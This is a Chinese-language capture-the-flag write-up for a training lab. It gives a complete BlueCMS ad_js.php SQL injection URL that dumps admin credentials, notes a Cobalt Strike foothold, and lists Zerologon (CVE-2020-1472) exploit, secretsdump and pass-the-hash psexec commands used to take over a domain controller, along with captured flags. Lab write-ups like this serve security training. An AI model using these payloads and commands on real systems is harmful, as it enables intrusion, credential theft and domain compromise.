Cyberstrikelab-Lab4

信息收集

fscan -h 192.168.10.0/24 -p 0-65535

flag1

BlueCMS

blueCMS v1.6 sp1 ad_js.php SQL注入漏洞

http://192.168.10.10:5820/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,concat(admin_name,0x7C0D0A,pwd),concat(admin_name,0x7C0D0A,pwd)%20from%20blue_admin%20where%20admin_id=1

1. 访问该页面查看源代码可以看到管理员账户密码admin|\r\na66abb5684c45962d887564f08346e8d

• \r\n是转义字符，后面的是密码a66abb5684c45962d887564f08346e8d的MD5加密后的值
  

2. 后台登陆地址http://192.168.10.10:5820/admin,使用账号admin，密码admin123456，成功登录

3. 在第3处右键选择使用新标签页打开

GetFlag

go-flag{ovuRsBeMqji13Rrc}

flag2、3

• 将刚才那台机子上线CS,并设置代理，上传fscan扫描，发现永恒之蓝，但是没有成功利用。

域渗透

192.168.20.30是域控。

用了Lab 3使用过的的 Zerologon 漏洞，通过其重置域控 hash

#测试是否存在CVE-2020-1472
proxychains4 python zerologon_tester.py WIN-7NRTJO59O7N 192.168.20.30

#漏洞利用
proxychains4 python cve-2020-1472-exploit.py WIN-7NRTJO59O7N 192.168.20.30

#hushdump
proxychains4 python secretsdump.py 'cyberstrikelab.com/WIN-7NRTJO59O7N$@192.168.20.30' -no-pass

#HASH 传递 域控
proxychains4 psexec.py -hashes :00f995cbe63fd30411f44d434b8dac98 cyberstrikelab.com/administrator@192.168.20.30

#HASH 传递 域成员
proxychains4 psexec.py -hashes :00f995cbe63fd30411f44d434b8dac98 cyberstrikelab.com/administrator@192.168.20.20

GetFlag

flag2:go-flag{yJzuQ09FXn0h7Em4}

flag3:go-flag{hAeek65Vho2s199D}